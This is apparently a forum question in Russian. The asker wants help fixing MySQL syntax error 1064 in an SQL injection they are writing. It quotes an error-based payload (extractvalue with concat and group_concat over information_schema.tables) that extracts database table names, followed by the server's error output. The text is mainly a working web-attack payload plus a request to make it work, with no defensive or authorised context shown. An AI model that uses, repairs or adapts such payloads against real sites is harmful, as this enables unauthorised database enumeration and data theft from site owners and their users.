Как исправить синтаксическую ошибку 1064 при написании sql-инъекции?
Сама инъекция:
'and(extractvalue(1,concat(0x3b,(select(group_concat(table_name)from(information_schema.tables))))))and'
Вот что выдает браузер:
Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(information_schema.schemata))))))and'',now())' at line 1
Error No: 1064